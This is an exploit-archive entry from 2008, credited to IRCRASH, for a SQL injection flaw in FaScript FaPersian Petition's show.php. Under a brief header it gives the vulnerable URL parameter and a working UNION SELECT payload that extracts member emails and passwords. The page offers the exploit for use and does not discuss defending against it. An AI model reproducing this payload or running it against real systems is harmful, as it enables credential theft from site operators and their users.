[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FaScript FaPersian Petition (show.php) SQL Injection Vulnerability
# Published : 2008-01-15
# Author : IRCRASH
# Previous Title : FaScript FaName v1 (page.php) Remote SQL Injection Vulnerability
# Next Title : FaScript FaPersianHack v1 (show.php) SQL Injection Vulnerability


#####################################################################################
####           FaScript FaPersian Petition Remote Sql Injection                  ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://fascript.com/fapersianpetition.zip                        #
#                                                                                   #
#Injection Adress :  http://Sitename/fp/show.php?id=<SqL Code>                      #
#                                                                                   #
#                                                                                   #
#SQL For find Username and password : 999999'%20union/**/select/**/0,1,2,3,4,5,6,concat(0x3c62723e200d0a4c6f67696e3a,email,0x3c62723e200d0a50617373776f72643a,password),8,9,10,11/**/from/**/member/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# www.Syue.com [2008-01-15]